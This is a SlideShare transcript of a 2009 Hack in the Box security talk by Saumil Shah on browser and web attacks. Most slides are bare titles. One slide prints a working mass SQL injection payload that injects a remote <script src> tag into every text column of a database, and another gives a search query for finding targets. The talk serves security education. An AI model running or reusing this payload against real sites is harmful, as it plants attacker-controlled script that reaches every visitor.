How to own the world, one desktop at a time
Loading...
Flash Player 9 (or above) is needed to view presentations.
We have detected that you do not have it on your computer. To install it, go here.
1 Favorite
-
Herbert Miosga
favorited this 3 weeks ago
How to own the world, one desktop at a time - Presentation Transcript
- How to own the world,one desktop at a time
Saumil Shah, Net-Square
Hack in the Box
Kuala Lumpur 2009 - # who am i
Saumil Shah, CEO Net-square
LinkedIn: saumilshah - I'M IN UR BASE
KILLIN UR D00DZ - "The amount of intelligence in the world stays constant and the population increases."
- The Attack Surface
- The Attack Surface++
- Browser Attacks
- Helping Hands
Alexander Sotirov, Mark Dowd - Bypassing Browser Memory Protection - Taking your work to the masses
SQL Injection
XSS - The metamorphosis of script src
- Web Hacking
- SQL Injection Discovery
inurl:".asp" inurl:"a=" - An example
- Mass SQL Injection vector
declare @m varchar(8000);
set @m='';
select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script src="http://is.gd/31337"></script>'';'
from dbo.sysobjects objs, dbo.syscolumns cols, dbo.systypes typs
where objs.id=cols.id
and objs.xtype='U'
and cols.xtype=typs.xtype
and typs.name='varchar';
set @m=REVERSE(@m);
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
exec(@m); - Documents
- Penetration Document FormatTM
http://blog.didierstevens.com - "Confidence in a connected world"
- Security by pop-ups
- kthxbai
www.net-square.com
secure . automate . innovate
87 views, 1 favs, more stats
As 2009 comes to a close, we look back on the bugs more
More info about this document
© All Rights Reserved
Go to text version
- Total Views 87
- 87 on SlideShare
- Comments 0
- Favorites 1
- Downloads 0
Most viewed embeds
All embeds
- Upload Info
- Also on LinkedIn
- Uploaded via SlideShare
- Uploaded as Microsoft PowerPoint
0 comments
Post a comment